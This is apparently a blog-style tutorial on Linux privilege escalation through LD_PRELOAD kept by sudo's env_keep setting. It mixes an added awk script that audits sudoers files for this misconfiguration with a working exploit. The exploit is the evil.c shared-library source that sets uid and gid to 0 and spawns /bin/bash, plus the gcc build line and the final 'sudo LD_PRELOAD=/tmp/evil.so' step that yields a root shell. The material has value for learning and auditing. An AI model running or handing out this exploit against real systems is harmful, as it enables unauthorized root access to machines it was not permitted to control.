What is LD_PRELOAD?
LD_PRELOAD is an optional environment variable holding one or more paths to shared libraries (shared objects). The loader loads them before any other shared library, including the C runtime library libc.so. This is also called preloading a library.
To avoid this mechanism being used as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.
Detection
Open a terminal and type:
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD
If the output looks something like this, congratulations: the target is vulnerable, and you can exploit the LD_PRELOAD issue to get a root shell. To accomplish the privilege escalation you also need a binary that you are permitted to run through sudo, which will then run with the LD_PRELOAD environment variable set, that is, some sudo command that the current user is allowed to run.
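The sudo -l check above covers one user on one host. As an added example (not part of the original post), the shell function below audits sudoers text directly for Defaults entries whose env_keep list preserves a dynamic-loader variable; it goes beyond LD_PRELOAD to LD_LIBRARY_PATH, LD_AUDIT and the sudoers * wildcard. The function names and the sample sudoers content are constructed for illustration.

```sh
#!/bin/sh
# Added example: flag sudoers Defaults whose env_keep list lets dynamic-loader
# variables survive sudo's environment reset. All names here are illustrative.

# Reads sudoers text on stdin.
# Prints "<line>: env_keep preserves <VAR> (via <entry>)" for each finding.
audit_env_keep() {
    awk '
    BEGIN { nvars = split("LD_PRELOAD LD_LIBRARY_PATH LD_AUDIT", vars, " ") }
    # Join backslash-continued physical lines into one logical line.
    { line = pending $0; pending = "" }
    line ~ /\\$/ { sub(/\\$/, "", line); pending = line; next }
    # Only Defaults entries matter (Defaults, Defaults:user, Defaults!cmd, ...).
    line !~ /^[ \t]*Defaults/ { next }
    {
        rest = line
        # "=" and "+=" put names on the keep list; "-=" removes, so skip it.
        while (match(rest, /env_keep[ \t]*\+?=[ \t]*("[^"]*"|[^" \t,]+)/)) {
            val = substr(rest, RSTART, RLENGTH)
            rest = substr(rest, RSTART + RLENGTH)
            sub(/^env_keep[ \t]*\+?=[ \t]*/, "", val)
            gsub(/"/, "", val)
            n = split(val, names, /[ \t]+/)
            for (i = 1; i <= n; i++) {
                pat = names[i]
                sub(/=.*/, "", pat)             # drop an optional "=value" part
                if (pat !~ /^[A-Za-z0-9_*]+$/) continue
                re = pat; gsub(/\*/, ".*", re)  # sudoers "*" wildcard to regex
                for (v = 1; v <= nvars; v++)
                    if (vars[v] ~ ("^" re "$"))
                        printf "%d: env_keep preserves %s (via %s)\n", NR, vars[v], names[i]
            }
        }
    }'
}

# Constructed sample input, not taken from a real host.
sample_sudoers() {
    cat <<'EOF'
# a comment mentioning env_keep+=LD_PRELOAD is ignored
Defaults env_reset
Defaults env_keep += "COLORS DISPLAY \
    LD_PRELOAD"
Defaults:deploy env_keep+=LD_*
Defaults env_keep -= LD_LIBRARY_PATH
user ALL=(root) NOPASSWD: /usr/bin/find
EOF
}

sample_sudoers | audit_env_keep
```

To audit a host, feed it the real configuration as root, for example cat /etc/sudoers /etc/sudoers.d/* | audit_env_keep; the reported line numbers then count across the concatenated files.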
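Program file:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* _init() runs when the loader maps the library, before the target's main(). */
void _init() {
    unsetenv("LD_PRELOAD");   /* keep child processes from preloading it again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}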
Exploit LD_PRELOAD.
Open a terminal and go to any writable directory to drop the shell source.
Writable directories include:
- /tmp
- /var/tmp
- /dev/shm
In our case we use the /tmp directory.
Create evil.c using any text editor; here we used cat to drop the shell source.
user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> #include <unistd.h>
> void _init() {
>     unsetenv("LD_PRELOAD");
>     setgid(0);
>     setuid(0);
>     system("/bin/bash");
> }
> EOF
Let's compile it into a shared object file.
gcc -fPIC -shared -o evil.so evil.c -nostartfiles
Time for the final step 3 :)
sudo LD_PRELOAD=/tmp/evil.so <COMMAND>
Here <COMMAND> means a command that you are allowed to run with sudo.

You can use any sudo command that the current user is allowed to run.
You Got a Shell!!!!!
